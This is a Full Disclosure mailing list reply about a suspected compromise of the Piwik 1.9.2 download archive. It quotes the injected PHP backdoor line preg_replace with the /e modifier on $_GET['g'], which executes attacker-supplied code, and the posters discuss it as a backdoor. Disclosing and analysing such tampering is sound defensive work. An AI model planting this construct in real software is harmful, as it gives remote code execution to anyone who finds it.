Full Disclosure mailing list archives

Re: Possible infection of Piwik 1.9.2 download archive

From: Christian Sciberras <uuf6429 () gmail com>
Date: Tue, 27 Nov 2012 12:54:57 +0100

At the moment I'm trying to figure out the further sense of this code,
but it seems that there might also be some kind of backdoor (because of
the use of $_GET).



preg_replace("/(.+)/e", $_GET['g'], 'dwm');

You think?


Chris.


On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker <max () grobecker-wtal de

wrote:

preg_replace("/(.+)/e", $_GET['g'], 'dwm');

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Possible infection of Piwik 1.9.2 download archive Maximilian Grobecker (Nov 27)
- Re: Possible infection of Piwik 1.9.2 download archive Christian Sciberras (Nov 27)
  - Re: Possible infection of Piwik 1.9.2 download archive Felipe Montecino (Nov 27)
  - Re: Possible infection of Piwik 1.9.2 download archive Max Grobecker (Nov 27)
    - Re: Possible infection of Piwik 1.9.2 download archive Ferenc Kovacs (Nov 27)